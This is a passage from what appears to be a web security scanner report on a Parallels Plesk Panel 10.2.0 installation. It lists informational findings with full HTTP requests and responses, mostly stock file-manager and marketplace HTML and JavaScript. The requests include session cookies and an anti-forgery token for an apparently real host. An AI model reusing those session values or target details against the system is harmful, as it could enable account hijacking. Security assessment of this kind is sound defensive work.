width="100%"><tr><td>9 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

8.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/rename/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=cgi-bin HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:31:24 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:31:24 GMT
Connection: close
Content-Length: 22337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager_rename_dir/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/rename/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="rename_dir">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


















<div class="formArea">
   <fieldset>
       <legend>Rename directory <span class="name"><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();">cgi-bin</a></span></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name"><label for="fid-new_file">Directory name</label>&nbsp;<span class="required">*</span></td>
               <td><input type="text" name="new_file" id="fid-new_file" value="cgi-bin"></td>
           </tr>
       </table>

   </td></tr></table></fieldset>
</div>








<input type="hidden" name="file" value="cgi-bin">
<input type="hidden" name="subcmd" value="">



   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"></td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to submit the changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);rename_update_oC();;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);rename_update_oC();;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);cancel_oC();;return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);cancel_oC();;return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

8.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/search-data/catalogId/marketplace

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /smb/app/search-data/catalogId/marketplace?name=&vendor=&packager=&cert=any HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/market/id/marketplace
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:19 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:20 GMT
Connection: close
Content-Length: 52670

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/norton-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'>Norton Internet Security</a></h4>
<div class="package-description">Protect your desktop against viruses and spyware</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><img src="http://catalog.marketplace.parallels.com/storage/Persony%2C%20Inc./Persony%20Web%20Conferencing/2.2.24.0-15/Persony%2C%20Inc./undefined/undefined/undefined/resources/images/persony_icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'>Persony Web Conferencing</a></h4>
<div class="package-description">Meet and collaborate with customers using web and video conferencing</div>
</div>
</div>
<div class="package-actions">
